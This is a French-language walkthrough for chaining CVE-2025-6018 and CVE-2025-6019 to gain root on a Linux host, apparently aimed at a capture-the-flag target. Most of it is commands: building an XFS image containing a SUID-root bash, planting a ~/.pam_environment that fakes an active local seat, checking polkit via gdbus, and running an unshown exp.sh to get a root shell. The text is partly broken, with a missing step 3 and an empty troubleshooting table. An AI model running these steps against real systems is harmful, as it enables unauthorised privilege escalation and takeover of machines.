CVE-2025-6018 + CVE-2025-6019 Guide d'élévation de privilèges
English
📋 Étapes d'exploitation rapides
Étape 1 : Préparer l'image XFS (Machine locale)
# Créer une image XFS de 300 Mo
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# Monter et installer le SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# Vérifier (devrait afficher 300M)
ls -lh xfs.image
Étape 2 : Transférer les fichiers vers la cible
# Connexion SSH à la cible
ssh [email protected]
# Écrire les variables d'environnement PAM
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
# Vérifier la configuration
cat ~/.pam_environment
# 🔥 Critique : Se déconnecter (pour activer la config PAM)
exit
Étape 4 : Deuxième connexion - Exécuter l'élévation de privilèges
# Re-connexion via SSH (la config PAM est maintenant active)
ssh [email protected]
# Vérifier que PAM est actif (devrait retourner "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# Exécuter le script d'élévation de privilèges
bash exp.sh
✅ Indicateurs de succès
Si l'exploitation réussit, vous devriez voir :
✓ SUID bash trouvé : /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Accès root confirmé !
════════════════════════════════════════════════════════════
║ DRAPEAU ROOT ║
║ <flag_here> ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
🔧 Dépannage
| Problème | Solution |
|---|
| retourne |
📌 Points clés
- ✅ Doit se déconnecter et se reconnecter : La config PAM ne prend effet que dans les nouvelles sessions
- ✅ Vérifier CanReboot : Confirmez qu'elle retourne
('yes',) avant d'exécuter le script
- ✅ Utiliser une connexion SSH : N'utilisez pas l'exécution de type
ssh -t user@host "cmd"
🐱 Gardien du chat
Si cela échoue, assurez-vous que chaque étape est exécutée strictement dans l'ordre !